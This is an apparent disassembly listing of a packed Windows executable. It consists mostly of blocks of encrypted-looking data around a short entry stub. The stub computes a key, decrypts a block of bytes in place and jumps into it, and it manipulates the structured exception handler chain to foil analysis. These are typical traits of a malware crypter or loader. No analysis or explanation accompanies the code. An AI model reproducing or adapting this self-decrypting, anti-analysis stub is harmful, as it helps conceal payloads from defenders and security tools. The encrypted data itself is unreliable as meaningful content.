dd 0D27DAF8Bh, 0BC5F80D2h, 9E2F6866h, 6B32304Ah, 52725A24h
dd 13C20F10h, 23D71711h, 1BC61BEBh, 3D9DC494h, 0C58688E7h
dd 86B2F683h, 0CC7AA0C5h, 0DC19988Fh, 0ED42ED46h, 85071D2Ah
dd 2B51D2ACh, 5D0D8D58h, 499F527Ah, 4C9BEC79h, 9F0C90ADh
dd 0E4B5D3ABh, 444E35D5h, 0E412E5C9h, 0A007D056h, 0D2C06238h
dd 202C01D6h, 36818ECDh, 470C4A67h, 2E3B366Ch, 5130F520h
dd 0F9CCBFB7h, 0BDC89236h, 0E27347CAh, 425F581Bh, 36295A02h
dd 14F58EDEh, 6A582B04h, 196F333Bh, 913B600h, 0AE9D5041h
dd 5EB4770Dh, 60620B16h, 0E6B2A582h, 5CF7D6C9h, 8B3C9A75h
dd 0F75B69F8h, 9B4A0618h, 15712CFh, 5B28623Eh, 63C90C7Bh
dd 5B09A06Ch, 56B346AFh, 1EDEF95Ah, 0E309F4B3h, 5D074431h
dd 8A240B4Ah, 0A6E66CF7h, 1EEFE0Dh, 56192Dh, 482E766Eh
dd 6AAA141Bh, 0BA9B1227h, 6C9E6817h, 8A886499h, 3F6D5C4Fh
dd 0A1C79638h, 0B90FD5B6h, 44DABEF6h, 0E80D2C2Fh, 0FF5515CDh
dd 44296C3Ch, 7FC1111Ah, 10DE0239h, 0A4E475C2h, 42E2650Dh
dd 89E74BAFh, 0E8ABBAC6h, 0EB5A8292h, 45DABEF5h, 0E70D2BE4h
dd 0AF04D117h, 7F3C3351h, 2C842F53h, 0BCCD1E69h, 6A998415h
dd 8E310F97h, 5B080DAh, 0AFDB4550h, 2C835CDCh, 0A525D8D3h
dd 0FC55520Ch, 0AC551823h, 61F8CF6Ah, 0D484777Dh, 72B093FDh
dd 59B99D7Fh, 239C8C96h, 0B5D3F1E8h, 0D2BBFEEAh, 0F79B2EDBh
dd 2625D8DFh, 0E53D0001h, 8E256B55h, 75195E50h, 0D5D44711h
dd 71B087F2h, 0BD37FC7Eh, 60C9BCBEh, 0D46D2E9Dh, 14F78ADAh
dd 8522265Fh, 58DAB9F2h, 0E40D2C4Bh, 0FB5170B2h, 0A7E03038h
dd 29B45E10h, 9D26D33Fh, 0BFB24551h, 91367E68h, 216564CDh
dd 9CF78AE2h, 12AB5289h, 0CC25D8D1h, 0C3599584h, 0AE051810h
dd 1107315Dh, 28862F1Ch, 0AA64DE65h, 5682599Dh, 18934C16h
dd 136D2E88h, 0C9F78AE1h, 683D7B2h, 0CB15C854h, 0B26D565Ch
dd 6CAA4A4Eh, 105D1CD3h, 0FA11B815h, 0F89B6E48h, 659C8BFEh
dd 2218C92h, 7C1F5C5Bh, 0AAE5C74Dh, 0FE8B16D7h, 9C25D8FAh
dd 90E5F53h, 7AAEA47h, 1A21B5F2h, 72D2477Ch, 77736A3Ch
dd 934D8A88h, 5BDCC014h, 0DD98F5A8h, 6BCC528Bh, 34C92E29h
dd 0C915FDA2h, 0B44B6550h, 72D8D12Eh, 0E5D007Bh, 74D5161Ah
dd 6DCA0F32h, 7F87E086h, 0FF368CA0h, 81D08F8Ah, 0EDE8527Fh
dd 0B00239A1h, 8076E8EDh, 8F7C5749h, 0BA113655h, 9892307Fh
dd 24B46B0Bh, 3B9B5289h, 1FA2678h, 89FF8EAh, 0C185D6CAh
dd 208EABDh, 0AF3EFA0Dh, 3890657Fh, 0B63D3028h, 0F55518D3h
dd 0F36D5A64h, 13A85EDCh, 0E80ED360h, 0DCB24568h, 58E44B33h
dd 28B2F5A5h, 0BD122F43h, 6A8DD1E3h, 29B065E7h, 8D3D301Ch
dd 0A254724Dh, 0B6F5863h, 0F17BC748h, 0C66143B7h, 620FF689h
dd 67C9BC98h, 0F688A8D0h, 6AF7BAA8h, 9D22B847h, 0C52900EAh
dd 8F6A0002h, 0C01E5B56h, 46291E02h, 0B47B470Bh, 38AB721Fh
dd 4FB51DE6h, 0D3448C8Ch, 7DD0BB15h, 394A37E3h, 440EE1FDh
dd 3BDA1965h, 0DB3D0CE9h, 0BC1C4F18h, 5D287E66h, 6CC80368h
dd 760EA15Dh, 0CBB24558h, 504D834Bh, 0EFE0A3A0h, 93F7BFD1h
dd 5FBB5CD0h, 9A25D8F0h, 0F6F4BD8Dh, 0A4BD1827h, 8B92CFDFh
dd 2FA88AF8h, 0B2945E5Ch, 4DB27763h, 6559600Bh, 13B4A3A1h
dd 92F7BBB9h, 86A34430h, 6A4E8D7h, 0DA3CFE6Fh, 9B809C47h
dd 9D937D2Eh, 1FB36A88h, 43C39DD9h, 5E391C7Eh, 0F1378B8Ah
dd 7BEF8EC8h, 2F755B53h, 0AA3DF069h, 4F0D92E7h, 0EA1B547Ah
dd 64AC4617h, 85B0297h, 9B8D85C0h, 36995DD5h, 0C6BC33F8h
dd 0EBF7758Ah, 4BFE0724h, 6C707EB8h, 0AB0CFFE1h, 0C349E68Dh
dd 4FC5FF95h, 0F16239D2h, 795D5ADh, 1F8024C1h, 0A315C85Ch
dd 4D9F52D1h, 379499E0h, 5768355Eh, 5271B788h, 0AB4B4BC0h
dd 7FAFE5E7h, 0DA09DC3Bh, 80B91CA6h, 6096D3D8h, 1F8043D1h
dd 0BF717102h, 0B2FA5547h, 54E9B91Fh, 0A96112A1h, 23F38698h
dd 5C5825CEh, 57AC1B18h, 0DA08DB40h, 0E538137Dh, 5A682B2Eh
dd 0DEEABD16h, 0BB966970h, 0C0B95437h, 54F4C81Fh, 0CDD4CEA1h
dd 0B6B63EB2h, 0A2E90DDBh, 0D021A9E5h, 9025F8B5h, 0D50B1914h
dd 786AA26h, 4E76A184h, 26B11C57h, 0C0FC5D8Ch, 54EF7937h
dd 7BC675A1h, 0BCD4B4B8h, 8428B3F9h, 0F83FCCC7h, 0F413DCDAh
dd 896B692Fh, 2150C0Eh, 51340F0Fh, 0C9C3577Ch, 7D808BE6h
dd 0C806048Ah, 11D99CA1h, 0C1A7E3B8h, 86C65F30h, 4F95E1D7h
dd 0DA05EDCDh, 0EAAE107Dh, 5968E145h, 1F7C3AADh, 52B6705Ch
dd 0B2FD6D79h, 54EA611Fh, 771C18A1h, 0FAE459E8h, 0AA06C9C7h
dd 0E2C55D6Ah, 8963F7CFh, 0DD8D9AE8h, 0C8E1271Eh, 0AAF66A3Bh
dd 36A279A3h, 589BC9F0h, 0E9C083BAh, 4BF9642Ch, 0F8209AB8h
dd 0F95399CFh, 0EEA14A18h, 22B0F6CFh, 60647017h, 0BDEED8A5h
dd 1F4A11BAh, 986359ECh, 0A5C87B06h, 9B4074D0h, 98C1EBC0h
dd 939A3DB1h, 658F2D24h, 7F9610CCh, 0DA02D900h, 6CDA9E4h
dd 0F7319CC5h, 2F558DD0h, 592DD35Ch, 4CA75A66h, 54D6ABFEh
dd 84D598D4h, 0A2C0C62Dh, 54BE46CFh, 0C21AEDC9h, 5FF6E58Bh
dd 0F1792CB1h, 861242Eh, 3186BE83h, 0DF8F526Ch, 0B259977Bh
dd 64B942D7h, 552B222Ch, 6DBDAE88h, 9A2EC85Ah, 3DE15FE7h
dd 0DA8B77F0h, 74C10B17h, 850132Dh, 0E0213A2Fh, 6A20CC9h
dd 4265ED73h, 64BCDB0Eh, 2B13BDA1h, 0C2E9C7E8h, 0AA69C5A5h
dd 94D8DBE7h, 0F1DE6700h, 9C40A27h, 3ADB2DD1h, 96763941h
dd 6BD57D9h, 4629EA73h, 0E9BB4EBAh, 4BE28634h, 0F8BBFDB8h
dd 3FFF93CFh, 0C227F6F2h, 0D5D1097Ch, 0F1420993h, 0F75E4B2Eh
dd 2F453FF0h, 2719B05Ch, 0CEA3565Fh, 0E0B58272h, 7BD19748h
dd 0A2F32E31h, 60CCC2FFh, 91471AE5h, 88299AAFh, 0C042BDE9h
dd 92A2201Dh, 1E441CB1h, 0B1848EDEh, 4CA266B7h, 0E630B5BAh
dd 7AE0A3BFh, 0F9B6FBE6h, 0A8F1C1D1h, 858027B5h, 5D2CDFD1h
dd 91C008D5h, 8F5C1F2Fh, 2D4315C6h, 7F018E5Ah, 2BF2DC49h
dd 0B08B7B88h, 8838539Ch, 156F4841h, 0A7CDF0E2h, 7289C6Fh
dd 0D72BF530h, 2F40D427h, 0E4ACEFDCh, 2C55B0CBh, 3C4A4C69h
dd 0B3A628C7h, 323A4C64h, 3B799E86h, 0C635ABA1h, 0A5D47EA7h
dd 0E1295733h, 2F44848Ch, 6E0B1B67h, 765B1150h, 273ABF9Eh
dd 319C09D3h, 0D12722Dh, 0B94186CEh, 0F2F651BEh, 8ED497AFh
dd 0E170E708h, 359BD9C6h, 0D529EC42h, 0DD82C421h, 33772B1Bh
dd 2B5E036Eh, 7AF30477h, 38F20F1Ch, 31DC56E4h, 7CC1E0FAh
dd 0EB8A9A90h, 0C197DCB8h, 0DF63A7C1h, 0A040C9C4h, 0C47A7365h
dd 492C5507h, 69035C4Dh, 5EEF6737h, 35B20F0Bh, 378B58E7h
dd 55E9BFA6h, 0F886CCC5h, 83C881A1h, 0DC79B688h, 0E21A9E90h
dd 934B7130h, 236A7F4Bh, 7C1C5E5Ch, 1FBF3A30h, 69A0614Eh
dd 3CC110EAh, 79F4E8F7h, 1F2FBBh, 92C8A045h, 394162DFh
dd 7CD4ED1Eh, 0D6BF087Ah, 6E245252h, 9CAEC448h, 3509CCAAh
dd 0F59B6E5Bh, 595BF6BEh, 9DBC226Bh, 0FFCF9C30h, 0A0B03130h
dd 66D10EFBh, 9E67D529h, 48594Ah, 17AB336Ah, 166D3210h
dd 2D841F3Bh, 0B573056Ah, 2F4D8A7Ch, 694407B8h, 4E0939Fh
dd 6FDCBBF2h, 8B325C93h, 57811B08h, 0E6438DD4h, 0D9E0ADA9h
dd 0E691300Bh, 0E30F84F6h, 0FE165582h, 5A825B7Fh, 4216076Bh
dd 0E9DC0F67h, 0E5CBBCB7h, 9722D3ABh, 0BB79D45Eh, 92133CE0h
dd 885524FEh, 9F50D3D2h
dd 78018150h, 429B6E58h, 1CEA3042h, 4DFBF896h, 87B2E0FEh
dd 61D291B0h, 8B0E2E24h, 0CE68BCBBh, 0B500127Fh, 8855486Ah
dd 402C0D32h, 0AF8B4700h, 0BE64A026h, 68E1F080h, 5C228CA5h
dd 791E3C45h, 0A0F4313Ch, 0F640988Dh, 33026CFDh, 0B300FFF5h
dd 0F41B4D62h, 0ED932CBCh, 6AD37AB0h, 0C4946C55h, 0A84D8B6Ch
dd 3A9ADCA9h, 8364ACE4h, 0AF08453Ch, 49203902h, 482A170Eh
dd 1CC2FDF0h, 0ECBDCA13h, 0F96D3037h, 0D77BB917h, 3F9B5E8Dh
dd 0BB33287Ch, 6DF9A5AAh, 84E19143h, 0A908DEC1h, 832D6453h
dd 4241E8C0h, 0B180802Ah, 0F855282Fh, 0BE853A43h, 0CE7BB8B3h
dd 3E9B5F77h, 188CF41Dh, 644C83C8h, 8E0A3A8h, 44F4869Eh
dd 0E23550B1h, 32A0E7AAh, 163D0007h, 0D8550E5Dh, 8A623035h
dd 268447A7h, 3FC71D95h, 5453F175h, 15488C91h, 0A2C08388h
dd 4D73B59Fh, 590ED1D6h, 36DA1549h, 0E0F48209h, 0B5DE181Dh
dd 1E27BB3Ch, 21F78660h, 39709E51h, 193BBD7Ah, 414C0580h
dd 69E09397h, 670847E8h, 0B00E7E3Dh, 0EFB863EDh, 0DC3D3035h
dd 0C6653381h, 0F103D833h, 0A08BB8B5h, 3B9B5EEEh, 6291C0F3h
dd 37428CBFh, 683EA09Ah, 680847EAh, 0E58FACA6h, 0C72588C8h
dd 88C38BE4h, 78416218h, 3C7D3087h, 33FE4449h, 3A9DADD9h
dd 0F4412277h, 6A2A8D3Fh, 21BF0756h, 4C6B5EEh, 0AE8C565Eh
dd 4F43E8EBh, 22C29B93h, 1185F0E5h, 8037CFCEh, 68874B02h
dd 3FDAD34Fh, 0D99A365Dh, 67C9D30Ah, 5EA664A4h, 0B5D79A9Bh
dd 26269A5Bh, 40AEF8A0h, 0DC0D3025h, 805D5220h, 227B933h
dd 0A2940546h, 0B39B063Dh, 7F825AF0h, 6E8B8D8Ch, 4EB0E0A2h
dd 0B67CDE68h, 0F40C5EB5h, 0F422556Ah, 0D43D0031h, 0DA98C9Ch
dd 2AD8CFD0h, 0DF847776h, 7B733C8h, 51078A74h, 9AC9BCBBh
dd 4CCB6E37h, 987A37B9h, 260EE1E0h, 0F315FB7Dh, 0B06F5100h
dd 0F6E0E717h, 0F76D001Eh, 2FA822D0h, 312EA15Ch, 0B2B24543h
dd 54E2411Fh, 84552EA1h, 6DF78A96h, 9A3ED27Ah, 57DABEE7h
dd 0DA0CD3A2h, 0C153B294h, 0CB6C2F1Eh, 1F8346ADh, 37F0005Ch
dd 675C99F2h, 94908BBAh, 35A63AEh, 17F689ADh, 628E130Fh
dd 32B1718h, 0EA2E867Ah, 0E16ED517h, 7D6B042Eh, 63032359h
dd 47F55078h, 0A5D06006h, 9B38754Eh, 2036A4D4h, 7A0A4745h
dd 55F3301Dh, 0EFDCC886h, 0C80EAB87h, 0F15230AFh, 0AD824D2Eh
dd 6A7EBBBAh, 12DCD065h, 0B21AFF43h, 0EFC6B9A4h, 0FABBA8F1h
dd 0E1F6B182h, 0AA6398EAh, 49221AE7h, 8839963Bh, 58C4EB47h
dd 8B691C02h, 21014B81h, 6AA86500h, 8B2D7206h, 99CD608Eh
dd 434605Eh, 0F30C4947h, 0AA7E750Ch, 73CAE4E7h, 0DA38D447h
dd 0F140FB17h, 28AA2B2Eh, 1F4FFA45h, 357E595Ch, 8FAD7073h
dd 304987AEh, 55169285h, 0EEF24D3Bh, 0AAE1ACD6h, 4920E3E7h
dd 8707DEABh, 1CCE089Ch, 8570199h, 0E09046ADh, 325739A3h
dd 150Dh dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_419017
call sub_419057
push dword ptr fs:0
pop ebp
add ebp, 8
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419017 proc near ; CODE XREF: start+3�p
sub edx, edx
sub ecx, ecx
mov cl, 35h
loc_41901D: ; CODE XREF: sub_419017+7�j
inc edx
loop loc_41901D
call sub_419054
add esi, 3Fh
push esi
mov ecx, 243Ch
loc_419031: ; CODE XREF: sub_419017+2B�j
xchg al, [esi]
sub ax, dx
mov [esi], al
add esi, 1
inc edx
sub ecx, 1
cmp ecx, 0
ja short loc_419031
pop esi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp esi
sub_419017 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419054 proc near ; CODE XREF: sub_419017+9�p
pop esi
jmp esi
sub_419054 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419057 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_419057 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 38371EC5h, 40C63A39h, 6BBF3561h, 44434265h, 0D1C74645h
dd 4C74F6E1h, 74ABD94Dh, 5080C655h, 807DFAEh, 0E55B5A82h
dd 60881215h, 931BE261h, 50676689h, 46E77DEh, 706F929Dh
dd 7375CDFCh, 37F61A8h, 7C9FAB11h, 0DBB27D7Dh, 0F00417D6h
dd 0F8F18AA9h, 6F0C8A89h, 8F8E7E8Dh, 0A4997F12h, 142296D5h
dd 51289EBDh, 0A0DFD2D9h, 0A4A3A25Ah, 294B99A5h, 14FFF824h
dd 0BD242116h, 41EFF53Ch, 391DCEB9h, 30000AF1h, 0C0AA3FC5h
dd 39C3C2C2h, 401751A7h, 3E569DCCh, 0E81959EDh, 8124C5D4h
dd 505899D8h, 4122DAD8h, 61FA5351h, 5633E559h, 0FA5C4954h
dd 2DF2626Ah, 65615251h, 0FF6B73FAh, 0F86A695Ah, 0D3DDFF6Dh
dd 29C25B56h, 768E260Dh, 0FB0A5F29h, 5A0FC118h, 132B8898h
dd 9B479D0Ch, 24FF0918h, 5F1B1A19h, 85928D89h, 88918369h
dd 7B278B91h, 0B1B40028h, 306F6369h, 34333F19h, 9DA97935h
dd 81A0AE9Ah, 0B4ADA3B3h, 43964282h, 88CCCF1Bh, 344B8A7Eh
dd 504F4E5Ah, 0A0C7B798h, 9DCBC9B6h, 0CECACCCBh, 365EB15Dh
dd 99A7E7EAh, 0D84F66A5h, 0F16B6A69h, 0C090E22Dh, 0A9B70770h
dd 38FC76B5h, 1088AEEh, 80BF8F4Fh, 6C82D20Bh, 888786F3h
dd 218A0674h, 90CFC3C9h, 0C8C41788h, 989796D5h, 0BA0F1A99h
dd 0D4D4532Ah, 202EA2E1h, 4D4BAAC9h, 0E55D4734h, 653AAEEDh
dd 0B4F3EB67h, 0F1717340h, 7F18BAF9h, 2ABF2817h, 2EC32CC1h
dd 0C8C82EC5h, 9056CACDh, 3A1FCE37h, 0D3975DDDh, 372B2CB7h
dd 0FDBDA0Ch, 0DFB9C6A6h, 7970E1E0h, 0E827F786h, 3C3C3B3Bh
dd 252F83ECh, 0B876F231h, 0EA81B915h, 0FC1D59B2h, 400F2EFDh
dd 0FDE5D803h, 598000C8h, 0E8AD0777h, 507E61E3h, 0C0C50ABCh
dd 99291B3Ah, 139DA2E7h, 447D5F10h, 4ABE8D7Fh, 0E341176Ch
dd 884680D4h, 5075143h, 62932947h, 0D10385Bh, 3836F094h
dd 338390F3h, 0E3D45F99h, 45C2C60Bh, 68A26A24h, 4F4E2BA3h
dd 7385CA7Ch, 0A4FE0344h, 0A95DA294h, 47137645h, 97F03A3Fh
dd 5CF6BAB8h, 0EFB5D317h, 0F4CD8206h, 9F6CEAEFh, 0CF9180E7h
dd 0A8BD9A06h, 2122B6B3h, 90D5AFCFh, 7C1A54F3h, 0AF6D0C77h
dd 148EA6D0h, 3705CF4Fh, 3FBE7B7h, 65AAB90Ah, 4C9FE13h
dd 0DC8E5976h, 5DE1E6F1h, 8DDD26Ch, 374E4BC3h, 0D3A56A9Dh
dd 0FEFD5F8h, 0FC04A2DBh, 24587699h, 75CAD788h, 4F418661h
dd 0A169AD8Eh, 0D3830ECEh, 32D41F3h, 0C3F1F7FBh, 98123274h
dd 0A40D51D3h, 2CC0FA3Ch, 332C2449h, 0E28DAC22h, 7079E684h
dd 600DEA6Fh, 0A351575Bh, 787212D4h, 2BE9B333h, 0F7EF9F9Bh
dd 0AC0170FEh, 0E4EDF28Fh, 15D9C8E3h, 0DAF8C667h, 0AD0906BCh
dd 9F9DA3A7h, 447E3E00h, 707B527Fh, 0C9EC666Ch, 488D47A7h
dd 3439432Bh, 46D9432Fh, 0CE7554Eh, 120365D0h, 587E8DF9h
dd 0ABD51AECh, 114089BCh, 0A86DA767h, 0C31DADA3h, 18201911h
dd 6C717675h, 0CA1B699h, 0D1744E17h, 30F54FB7h, 0B30DBB0h
dd 0C1FC1257h, 21C99B88h, 0DB36EAAFh, 0CE93FE6Ah, 0FD3CC2C7h
dd 0A4E9834Bh, 9319999Fh, 78C857Dh, 2862C6F4h, 5549BD63h
dd 33BACFC2h, 0A9A8367Bh, 185D57FFh, 8B0A9E26h, 0B0045C7Ch
dd 946671EBh, 8FCD12C4h, 3134BF13h, 0A0657DC8h, 99BD2322h
dd 71DC8247h, 0EB6A7F06h, 906430DCh, 514F2E4Bh, 0ADBA615Ah
dd 14D934E5h, 2BC986h, 3CBCCFA5h, 0DBBE65E3h, 0FDC88E79h
dd 8AB5946Ah, 13F633C3h, 118DD2A4h, 74797E77h, 5CF29EE6h
dd 0A39C9420h, 0ADE428AAh, 24297B2Fh, 0AB771A1Fh, 67054D90h
dd 0C65916E5h, 0BE40408Ah, 0D98FE2CFh, 7028B6BBh, 0D424A2FDh
dd 84218E39h, 4A7D7A7Fh, 868F372Bh, 0B508A249h, 34795323h
dd 0E069ADD7h, 0CEA64C3h, 12517D07h, 0EA579F3h, 2AD5341Fh
dd 0BC5718C9h, 0A856F04Fh, 659988A3h, 27B519A5h, 0AC861A08h
dd 0D5B6B167h, 23CD5D66h, 0A5908984h, 5C1126D8h, 2417B17h
dd 0DB70FE03h, 0F5664FFEh, 0CC91E6DBh, 0A489473Ch, 4454AEF3h
dd 98750F14h, 932F86CBh, 2862FE04h, 546BC663h, 57914A4Fh
dd 7C86615Eh, 0A6869477h, 0A3AEBABCh, 0C4D6B0DCh, 0DC22CBD8h
dd 628127h, 3DB9FED0h, 607A662Ch, 7645669Bh, 0FFF85CA7h
dd 0A45E1AE0h, 9715DF5Fh, 0E6B385B8h, 0A3FF0835h, 0E61A084Fh
dd 5FBA7h, 285649FBh, 77524444h, 72626083h, 8F9A9698h
dd 33D3A688h, 0C882CE24h, 0C23D0983h, 2E152019h, 7CC69526h
dd 0BB3D0274h, 0DB7C1EEFh, 502A268Ch, 0A601700Bh, 0B88221F5h
dd 8DD99EF0h, 0C0C5CBA7h, 3592A146h, 47F1C69Bh, 71E503A6h
dd 0DE847A3Fh, 2A2D0BEAh, 744D5297h, 0E4CE1D6Eh, 9D25EAFCh
dd 0CABDCA5Bh, 0A017086h, 0C01D8D95h, 2AD534D7h, 2436C5F1h
dd 25AD72A4h, 27E572E3h, 80895727h, 0DD2A697Bh, 0D5969246h
dd 44092427h, 71B6520Ch, 1C2133CDh, 365D6667h, 47492E34h
dd 0CD8D5FF2h, 0C56D69Bh, 3FC8B690h, 2BA192BFh, 0D0A7A61Ch
dd 91DD6E8Bh, 0AF3CA19Ah, 148E7AD0h, 0C1BDE54Fh, 2C321EF7h
dd 85187927h, 4C9E3E7h, 574C5F58h, 0DC1A735Eh, 0C8251A1Fh
dd 0B4B9E785h, 0A0A5A74Ch, 8C91969Ch, 787D8287h, 64696E73h
dd 37849090h, 0FC168ED8h, 0BC068D37h, 8F0E5E9Fh, 44C4A8ADh
dd 49401739h, 754A4319h, 6E679D6Fh, 0A3899D9Ch, 6E707D7Fh
dd 0DAB6E8DAh, 0D879D3CFh, 0F4F3FEFEh, 0F5104F8h, 441E2735h
dd 48427450h, 53155B7Ch, 88A26B79h, 0BC96B894h, 0C4BAABC0h
dd 0DFEFE3DFh, 0FEF0B6FCh, 35110304h, 27242043h, 31444D5Ch
dd 796F296Bh, 7A728678h, 0A094ABA0h, 0D2CDDECCh, 0CF5B7B8h
dd 19E2F4C6h, 0C3D13FFh, 2C363F2Dh, 594F09CBh, 54526658h
dd 7C758D86h, 7395A6ACh, 0CDCBC969h, 0EFC5D5D7h, 0FC0E4EDFh
dd 8E90E18h, 38420B19h, 5C365817h, 59523260h, 0B3909E8Ch
dd 0A9A58994h, 0CDA6969Ch, 0C1ECAED0h, 0E4FEE0EBh, 815C7E8h
dd 350B0B25h, 1548432Fh, 6C6A914Fh, 898D5F75h, 0B5937B76h
dd 0B0AED513h, 0CDE1D3B9h, 0F9FECFB7h, 14F219D7h, 211D2D08h
dd 416D4F43h, 696D3A3Dh, 95408248h, 898EA27Fh, 0A4BEA0AFh
dd 0E1E294A8h, 0E72DF3D4h, 0F1EDF200h, 21351A24h, 0EC321E27h
dd 86514722h, 6D786070h, 6FB59892h, 0B9D39A88h, 0DFB6C5C5h
dd 0B5E1C3E5h, 110266Fh, 2E2A22F7h, 412B2335h, 45662E74h
dd 6D7E506Fh, 0BAA35576h, 0E8928E90h, 0BABEAEA6h, 0DDF1E309h
dd 0FC01D700h, 59000000h, 21395D93h, 47432A51h, 6F704B4Ah
dd 9F7BA257h, 0A7A8A3A2h, 0B9E7FCFEh, 0CE5C9C9h, 1BE8F4D7h
dd 0D7180110h, 383A18EDh, 5970C637h, 7C567863h, 808D5F80h
dd 0ADA3A39Dh, 0ADC09BA7h, 0E4C2B567h, 0E1E5F70Dh, 0D2213EBh
dd 393DF92Bh, 3B0D4234h, 516D515Ch, 758E9E84h, 8AACAA78h
dd 0E4A29EA0h, 0A4CEDBDCh, 0F102F8CCh, 191ADCFBh, 260F3122h
dd 543E4A4Ch, 6C536379h, 6D8D5768h, 0BB887E7Bh, 0ADB7C513h
dd 0C9B7DFCBh, 22E1CBCFh, 22F11303h, 42D1110h, 3937433Dh
dd 69743B3Fh, 93685676h, 0AA699C90h, 0ADA39DABh, 0FAE6BAACh
dd 28D2CED0h, 6D8F2E5h, 1D192B2Ch, 4F4C284Bh, 0D84C5544h
dd 76886295h, 8D899B9Ch, 0BFBC987Bh, 0C5BCC5B4h, 0E0B37EDBh
dd 10AFC2Eh, 2900FB07h, 4F263626h, 50632E55h, 5E657B54h
dd 0C3946B74h, 0CB92C591h, 0BAB4C7AFh, 0F7D908CFh, 0EA0BDBEBh
dd 9802FE00h, 34442255h, 6225585Ch, 6F86494Eh, 0A378A686h
dd 7A39ACA0h, 0B7B3DABBh
dd 0D8F0BBC7h, 4EBDBD1h, 29050F00h, 4240373Ch, 487BC644h
dd 74566482h, 86725480h, 94A69F9Bh, 0D3CE9BC0h, 0A5DCBD5h
dd 0EA1EFADFh, 0C201D18h, 2E35F908h, 34303030h, 67533F66h
dd 92799D88h, 0CCB48484h, 0EB7E9592h, 0D0D7CFBFh, 0F395EAECh
dd 1910F5EFh, 430C1126h, 37593240h, 5D6F6862h, 8B316A5Ah
dd 0AF859684h, 0BDA7A2A2h, 0CDE2DBD1h, 0FF06D8EBh, 25FCD201h
dd 27B92225h, 3D4C4D42h, 724A9647h, 8E6B6773h, 88A88290h
dd 88BAADB2h, 0E0E5B4ACh, 0FEF632D4h, 0FA0703EFh, 1D481E2Ch
dd 524C3927h, 643C4739h, 70987270h, 0B09A8EA0h, 0B9B59474h
dd 0D4B2B0C5h, 0DADECEC6h, 0F62E6A30h, 321FFB07h, 48083624h
dd 567E5C50h, 49155B73h, 8EA67A6Dh, 9AA19789h, 92BDBFC0h
dd 0C0EAE6E8h, 0EDE3FAFCh, 6ACCDBF7h, 48455275h, 4F5A2C7Fh
dd 6F7C522Ah, 91728D74h, 939E7043h, 0B6CABAE2h, 0C9DABBE2h
dd 2AFDC3EFh, 113A1510h, 1E2E2C3Ch, 5956322Ch, 0A86E5A74h
dd 677C8351h, 0A1B79EACh, 0A9D6AB9Fh, 0DB5DA3CFh, 8C20537Ch
dd 303512F0h, 609E8E2Bh, 83315F3h, 444A0369h, 5BEA849Eh
dd 0F848A61Fh, 0F8A39697h, 5BF8E0E4h, 0D0AA6A0Ch, 80C5098Bh
dd 75A1079Ah, 90D85E23h, 0B5780D47h, 6C26A7B8h, 0C8185527h
dd 0A9F0EB9h, 1D996F42h, 9C66E6ABh, 0C85D56CAh, 1C09BEC3h
dd 0A0A543E1h, 8C67EA22h, 0B863BEFEh, 74696E9Bh, 0A253B45Fh
dd 82D946B1h, 22D32D0h, 0E4E8CF23h, 0EDA97F92h, 251CF63Bh
dd 0A51977CAh, 0FB4ECE93h, 253C668Bh, 9CE1BB33h, 0F51A8E36h
dd 74B96E83h, 33189B6Eh, 0C9C8A88Eh, 38FD7793h, 7BDBDB8h
dd 5CFD1A1Fh, 870C05FEh, 0A8E20A74h, 35546BE3h, 58C5CAAEh
dd 837C75FAh, 6575271Eh, 0B068E53h, 70759DD7h, 0F3EC98D3h
dd 0ECD2CDFAh, 0B1397E50h, 952CBE6Fh, 0C304B9Eh, 7F1A5A07h
dd 0A3608D86h, 0A80A9D02h, 0BCC1C6CBh, 94DA337Ch, 0C7995E99h
dd 0D60A0748h, 9D71B690h, 8AEB3B3h, 0D174FF04h, 30F54F13h
dd 0B3052AA6h, 4802FEA4h, 0F0B73B03h, 0E00D9FEFh, 81D1D6DBh
dd 0A27C1F48h, 5BBFAEF3h, 9A9F0F14h, 2E3186CBh, 685152ACh
dd 90D85E89h, 0BD087043h, 2C715087h, 95E042DCh, 4C908BDh
dd 0F01BFA1Bh, 0DDF729C0h, 0DB88D3EDh, 0ABBD1196h, 4CE52F9Ch
dd 8C883ECBh, 28048287h, 58B971AAh, 5AA3EFD4h, 96B8468Bh
dd 282D332Bh, 1511A8AAh, 0A8040A0Fh, 7751C1E2h, 797FD59Eh
dd 0E68CD35Fh, 33F3150Ch, 27D4B5E6h, 3C14E563h, 0B4CFB2B3h
dd 870B1C20h, 59A1EB8Eh, 0F4BC4207h, 50BEB937h, 2B155A2Ch
dd 0FB1789D6h, 0E893F932h, 0A352DE4Bh, 0CAEB8DCEh, 0ACAA5E13h
dd 5A2AA2A7h, 0CDB3F834h, 49B4CA4Ch, 9C332CF8h, 40D15757h
dd 0C1B2804Bh, 20E500E9h, 0B9503846h, 0F8FD025Fh, 896A2BF3h
dd 0D015C5D8h, 8A776352h, 6C2CB277h, 9B99A6BFh, 8085D30Bh
dd 744DF77Bh, 45D6265h, 444A52FBh, 0C0AA893Fh, 0A721E658h
dd 24918FBBh, 0F4F9FFFFh, 0F8E5849Fh, 0CCD1D6D7h, 0B8919491h
dd 283E4DDEh, 0C395DAACh, 78F41354h, 196D7278h, 25574814h
dd 406D4B65h, 5E71363Bh, 0E579B70Ah, 819B0ED3h, 0C0ACCE49h
dd 0DDE5CEB7h, 8F20D2D7h, 0B6D9E24Fh, 2DC0AAAFh, 8C518C83h
dd 84BD0750h, 0B47D115Dh, 50BB0ED6h, 0EAF49799h, 3579C75Ah
dd 91E21EE3h, 4EB51FCFh, 0F9FD8BAEh, 876AE227h, 6E9C808Fh
dd 3F42627Bh, 9CA1A7A7h, 0E24D85EEh, 1F68B773h, 30151A1Fh
dd 0FE01262Bh, 521D7AAh, 0E0AA2E73h, 10151C17h, 4E57AFEh
dd 0F605871Ah, 4BA8DEA3h, 97B23Ch, 0A86F13BBh, 92D722A7h
dd 0F4B8F20h, 306AFEF4h, 0E14AC96Bh, 885D52E4h, 820A4143h
dd 60A95C32h, 0DFC9E1Eh, 74080207h, 0E4E9EFE3h, 3DEBE85Fh
